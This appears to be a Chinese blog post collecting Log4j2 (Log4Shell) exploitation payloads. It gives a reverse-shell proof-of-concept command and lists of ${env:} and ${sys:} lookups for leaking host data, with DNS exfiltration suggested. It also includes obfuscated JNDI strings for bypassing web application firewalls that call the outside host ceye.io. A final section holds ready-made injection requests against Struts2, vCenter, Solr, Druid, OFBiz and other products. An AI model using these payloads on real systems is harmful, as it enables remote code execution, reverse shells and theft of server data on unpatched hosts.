【实战】log4j2远程命令执行漏洞利用姿势汇总

 

0x00 反弹shell

靶机:10.110.13.153
java -jar log4jRCE-0.0.1-SNAPSHOT.jar

http://10.110.13.153:18080/

攻击机:10.110.13.106
python3 poc.py –userip 10.110.13.106 –webport 8000 –lport 2345

攻击机开启监听后,执行payload获取shell:

 

0x01 获取敏感数据

log4j-java

ID usage method
1 ${java:version} getSystemProperty”java.version”)
2 ${java:runtime} getRuntime)
3 ${java:vm} getVirtualMachine)
4 ${java:os} getOperatingSystem)
5 ${java:hw} getHardware)
6 ${java:locale} getLocale)

数据中包含特殊字符时可考虑采用dns进行带外
依此类推

Linux

id usage
1 ${env:CLASSPATH}
2 ${env:HOME}
3 ${env:JAVA_HOME}
4 ${env:LANG}
5 ${env:LC_TERMINAL}
6 ${env:LC_TERMINAL_VERSION}
7 ${env:LESS}
8 ${env:LOGNAME}
9 ${env:LSCOLORS}
10 ${env:LS_COLORS}
11 ${env:MAIL}
12 ${env:NLSPATH}
13 ${env:OLDPWD}
14 ${env:PAGER}
15 ${env:PATH}
16 ${env:PWD}
17 ${env:SHELL}
18 ${env:SHLVL}
19 ${env:SSH_CLIENT}
20 ${env:SSH_CONNECTION}
21 ${env:SSH_TTY}
22 ${env:TERM}
23 ${env:USER}
24 ${env:XDG_RUNTIME_DIR}
25 ${env:XDG_SESSION_ID}
26 ${env:XFILESEARCHPATH}
27 ${env:ZSH}

Windows

id usage
1 ${env:A8_HOME}
2 ${env:A8_ROOT_BIN}
3 ${env:ALLUSERSPROFILE}
4 ${env:APPDATA}
5 ${env:CATALINA_BASE}
6 ${env:CATALINA_HOME}
7 ${env:CATALINA_OPTS}
8 ${env:CATALINA_TMPDIR}
9 ${env:CLASSPATH}
10 ${env:CLIENTNAME}
11 ${env:COMPUTERNAME}
12 ${env:ComSpec}
13 ${env:CommonProgramFiles}
14 ${env:CommonProgramFilesx86)}
15 ${env:CommonProgramW6432}
16 ${env:FP_NO_HOST_CHECK}
17 ${env:HOMEDRIVE}
18 ${env:HOMEPATH}
19 ${env:JRE_HOME}
20 ${env:Java_Home}
21 ${env:LOCALAPPDATA}
22 ${env:LOGONSERVER}
23 ${env:NUMBER_OF_PROCESSORS}
24 ${env:OS}
25 ${env:PATHEXT}
26 ${env:PROCESSOR_ARCHITECTURE}
27 ${env:PROCESSOR_IDENTIFIER}
28 ${env:PROCESSOR_LEVEL}
29 ${env:PROCESSOR_REVISION}
30 ${env:PROMPT}
31 ${env:PSModulePath}
32 ${env:PUBLIC}
33 ${env:Path}
34 ${env:ProgramData}
35 ${env:ProgramFiles}
36 ${env:ProgramFilesx86)}
37 ${env:ProgramW6432}
38 ${env:SESSIONNAME}
39 ${env:SystemDrive}
40 ${env:SystemRoot}
41 ${env:TEMP}
42 ${env:TMP}
43 ${env:ThisExitCode}
44 ${env:USERDOMAIN}
45 ${env:USERNAME}
46 ${env:USERPROFILE}
47 ${env:WORK_PATH}
48 ${env:windir}
49 ${env:windows_tracing_flags}
50 ${env:windows_tracing_logfile}

log4j2-sys

id usage
1 ${sys:awt.toolkit}
2 ${sys:file.encoding}
3 ${sys:file.encoding.pkg}
4 ${sys:file.separator}
5 ${sys:java.awt.graphicsenv}
6 ${sys:java.awt.printerjob}
7 ${sys:java.class.path}
8 ${sys:java.class.version}
9 ${sys:java.endorsed.dirs}
10 ${sys:java.ext.dirs}
11 ${sys:java.home}
12 ${sys:java.io.tmpdir}
13 ${sys:java.library.path}
14 ${sys:java.runtime.name}
15 ${sys:java.runtime.version}
16 ${sys:java.specification.name}
17 ${sys:java.specification.vendor}
18 ${sys:java.specification.version}
19 ${sys:java.vendor}
20 ${sys:java.vendor.url}
21 ${sys:java.vendor.url.bug}
22 ${sys:java.version}
23 ${sys:java.vm.info}
24 ${sys:java.vm.name}
25 ${sys:java.vm.specification.name}
26 ${sys:java.vm.specification.vendor}
27 ${sys:java.vm.specification.version}
28 ${sys:java.vm.vendor}
29 ${sys:java.vm.version}
30 ${sys:line.separator}
31 ${sys:os.arch}
32 ${sys:os.name}
33 ${sys:os.version}
34 ${sys:path.separator}
35 ${sys:sun.arch.data.model}
36 ${sys:sun.boot.class.path}
37 ${sys:sun.boot.library.path}
38 ${sys:sun.cpu.endian}
39 ${sys:sun.cpu.isalist}
40 ${sys:sun.desktop}
41 ${sys:sun.io.unicode.encoding}
42 ${sys:sun.java.command}
43 ${sys:sun.java.launcher}
44 ${sys:sun.jnu.encoding}
45 ${sys:sun.management.compiler}
46 ${sys:sun.os.patch.level}
47 ${sys:sun.stderr.encoding}
48 ${sys:user.country}
49 ${sys:user.dir}
50 ${sys:user.home}
51 ${sys:user.language}
52 ${sys:user.name}
53 ${sys:user.script}
54 ${sys:user.timezone}
55 ${sys:user.variant}

0x02 WAF Bypass

${jndi:ldap://127.0.0.1:1389/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://ceye.io/a}
${${::-j}ndi:rmi://ceye.io/a}
${jndi:rmi://ceye.io}
${${lower:jndi}:${lower:rmi}://ceye.io/a}
${${lower:${lower:jndi}}:${lower:rmi}://ceye.io/a}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://ceye.io/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://ceye.io/a}
${${upper:jndi}:${upper:rmi}://ceye.io/a}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://ceye.io/a}
${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://ceye.io/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.ceye.io}
${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostName}.ceye.io}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.ceye.io

0x03 其它已知受影响组件可利用的payload

Apache struts2
http://127.0.0.1:8080/struts2-showcase/token/transfer4.action -d struts.token.name=’${jndi:rmi://127.0 .0.1:1099/ylbtsl}’
http://localhost:8080/struts2-showcase/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/
 
VMWare VCenter
“X-Forwarded-For: \${jndi:ldap://10.0.0.3:1270/lol}” “https://10.0.0.4/websso/SAML2/SSO/photon- machine.lan?SAMLRequest=”
 
Apache James
“smtp://localhost” –user “test:test” –mail-from ‘${jndi:ldap://localhost:1270/a}@gmail.com’ –mail-rcpt ‘test’ –upload-file email.txt
 
Apache Solr

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json
/solr/admin/cores?action=CREATE&name=$%7Bjndi:ldap://0.0.0.0/123%7D&wt=json
/solr/admin/info/system?_=${jndi:ldap://0.0.0.0/123}&wt=json
/solr/admin/cores?_=&action=&config=&dataDir=&instanceDir=${jndi:ldap://0.0.0.0/123}&name=&schema=&wt=

Apache  Flink
POST: http://0.0.0.0:8081/jars/${jndi:ldap:%252f%252f0.0.0.0%252f123}.jar/run
 
Apache Druid

/druid/coordinator/${jndi:ldap://0.0.0.0/123}
/druid/indexer/${jndi:ldap://0.0.0.0/123}
/druid/v2/${jndi:ldap://0.0.0.0/123}
curl -vv -X DELETE ‘http://xxxxxx:8888/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2fdruid_test.yyyyyyyy%7d’

 
Apache JSPWiki
http://localhost:8080/JSPWiki/wiki/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/
 
Apache OFBiz
“Cookie: OFBiz.Visitor=\${jndi:ldap://localhost:1270/abc}” https://localhost:8443/webtools/control/main
 
 

Published by

风君子

独自遨游何稽首 揭天掀地慰生平

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注